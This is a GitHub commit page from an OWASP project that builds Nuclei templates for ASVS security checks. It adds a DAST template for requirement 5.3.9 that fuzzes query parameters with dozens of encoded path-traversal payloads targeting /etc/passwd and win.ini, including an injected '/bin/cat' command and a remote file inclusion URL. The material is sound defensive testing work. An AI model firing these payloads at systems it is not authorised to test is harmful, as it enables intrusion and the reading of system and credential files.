Skip to content

Commit

Permalink
Merge branch 'dev' into main
Browse files Browse the repository at this point in the history 
Signed-off-by: Hamed Salimian <[email protected]>
  • Loading branch information
@Snbig
Snbig authored Dec 14, 2024
2 parents ef78c33 + b528a57 commit 1969bac
Show file tree
Hide file tree
Showing 3 changed files with 156 additions and 2 deletions.
12 changes: 11 additions & 1 deletion index.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@

layout: col-sidebar
title: OWASP ASVS Security Evaluation Templates with Nuclei
tags: asvs-security-evaluation-templates-with-nuclei nuclei nuclei-templates asvs asvs-evaluation PoC-generator vulnerablity
tags: asvs-security-evaluation-templates-with-nuclei nuclei nuclei-templates ASVS asvs-evaluation PoC-generator vulnerablity automation WSTG pentest
level: 2
type: tool
pitch: This project aims to develop nuclei templates for evaluating OWASP Application Security Verification Standard (ASVS) on websites.
Expand Down Expand Up @@ -32,3 +32,13 @@ This project aims to develop [Nuclei](https://github.com/projectdiscovery/nucle
[![alt-text](https://img.shields.io/github/license/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/LICENSE)

This program is free software: You can redistribute it and/or modify it under the terms of the MIT License.

## Contributing

Contributions to this repository are welcome and encouraged. If you have created new Nuclei templates that evaluate additional ASVS requirements or have any idea about current templates, we'd love to hear from you in project Github [Discussions](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/discussions) or our [Slack channel](https://owasp.slack.com/archives/C052939BZ43).

For detailed information and guidelines about contributing in developing template for ASVS evaluation, please check [CONTRIBUTING.md](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/CONTRIBUTING.md)

#### Core Team
The project current core team are:
- [Hamed Salimain](https://github.com/Snbig) (Project Leader)
2 changes: 1 addition & 1 deletion templates/9.1.3.yaml
View file
Original file line number Diff line number Diff line change
Expand Up @@ -45,4 +45,4 @@ ssl:
- type: json
json:
- " .tls_version"
# digest: 4b0a00483046022100ad668aabd5f22ba949265c214a22dd6393fc9d65118f5551704be20c9791b4fa022100a7d26f7b256f003b8db0d8794e22f7e63f051f5674b5ff4ed8a01b6cfa8787e3:236a7c23afe836fbe231d6e037cff444
# digest: 4b0a00483046022100e28690ed9b4e02b2f1b32d3e5fea4266b8aea6d668d35365ed9e94ad9515ae8e022100e25e0fd48313f9be115c8f93bb91dc18ad74ebf1997576b72c99e810ac804570:236a7c23afe836fbe231d6e037cff444

Check warning on line 48 in templates/9.1.3.yaml

View workflow job for this annotation

GitHub Actions / build 

48:1 [comments-indentation] comment not indented like content
144 changes: 144 additions & 0 deletions templates/dast/5.3.9.yaml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,144 @@
id: ASVS-4-0-3-V5-3-9

info:
name: ASVS 5.3.9 Check
author: AmirHossein Raeisi
severity: high
classification:
cwe-id: CWE-829
reference:
- https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion
- https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_9/
- https://github.com/projectdiscovery/nuclei-templates/tree/main/dast/vulnerabilities/lfi
- https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/
- https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion
tags: asvs,5.3.9
description: |
Verify that the application protects against Local File Inclusion (LFI) or Remote File Inclusion (RFI) attacks.
metadata:
max-request: 90

http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'

payloads:
LFI-RFI:
# LFI (Linux)
- '/etc/passwd'
- '../etc/passwd'
- '../../etc/passwd'
- '../../../etc/passwd'
- '/../../../../etc/passwd'
- '../../../../../../../../../etc/passwd'
- '../../../../../../../../etc/passwd'
- '../../../../../../../etc/passwd'
- '../../../../../../etc/passwd'
- '../../../../../etc/passwd'
- '../../../../etc/passwd'
- '../../../etc/passwd'
- '../../../etc/passwd%00'
- '../../../../../../../../../../../../etc/passwd%00'
- '../../../../../../../../../../../../etc/passwd'
- '/../../../../../../../../../../etc/passwd^^'
- '/../../../../../../../../../../etc/passwd'
- '/./././././././././././etc/passwd'
- '\..\..\..\..\..\..\..\..\..\..\etc\passwd'
- '..\..\..\..\..\..\..\..\..\..\etc\passwd'
- '/..\../..\../..\../..\../..\../..\../etc/passwd'
- '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
- '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
- '..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
- '%252e%252e%252fetc%252fpasswd'
- '%252e%252e%252fetc%252fpasswd%00'
- '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
- '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
- '....//....//etc/passwd'
- '..///////..////..//////etc/passwd'
- '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
- '%0a/bin/cat%20/etc/passwd'
- '%00/etc/passwd%00'
- '%00../../../../../../etc/passwd'
- '/../../../../../../../../../../../etc/passwd%00.jpg'
- '/../../../../../../../../../../../etc/passwd%00.html'
- '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
- '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '\\&apos;/bin/cat%20/etc/passwd\\&apos;'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
# LFI (Windows)
- '\WINDOWS\win.ini'
- '../../windows/win.ini'
- '....//....//windows/win.ini'
- '../../../../../windows/win.ini'
- '/..///////..////..//////windows/win.ini'
- '/../../../../../../../../../windows/win.ini'
- './../../../../../../../../../../windows/win.ini'
- '..%2f..%2f..%2f..%2fwindows/win.ini'
- '\WINDOWS\win.ini%00'
- '\WINNT\win.ini'
- '\WINNT\win.ini%00'
- 'windows/win.ini%00'
- '/...\...\...\...\...\...\...\...\...\windows\win.ini'
- '/.../.../.../.../.../.../.../.../.../windows/win.ini'
- '/..../..../..../..../..../..../..../..../..../windows/win.ini'
- '/....\....\....\....\....\....\....\....\....\windows\win.ini'
- '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini'
- '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini'
- '/../../../../../../../../../../../../../../../../&location=Windows/win.ini'
- '..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
- '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00'
- '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini'
- '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
- '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini'
- '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'
- '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini'
- '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini'
- '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
- '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini'
- '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
- '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
- '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini'
- '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini'
- '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
- '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini'
- '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini'
# RFI
- "https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/rfi.txt"
fuzzing:
- part: query
type: replace # replaces existing parameter value with fuzz payload
mode: multiple # replaces all parameters value with fuzz payload
fuzz:
- '{{LFI-RFI}}'

stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and

- type: regex
part: body
regex:
- 'root:.*:0:0:'

- type: word
part: body
words:
- "d5b82f27-b7a4-4c3e-8b6e-88fd9e97b16a"
# digest: 4b0a00483046022100b3629f17d8650d25acbacc2d85fae5ad2c1cecf14c89bb28701ce2c7011ffe05022100a6db4746322beb7989b39c1b04fb416b31f02ac55a9690507e46a62ae93f2ac5:236a7c23afe836fbe231d6e037cff444

0 comments on commit 1969bac

Please sign in to comment.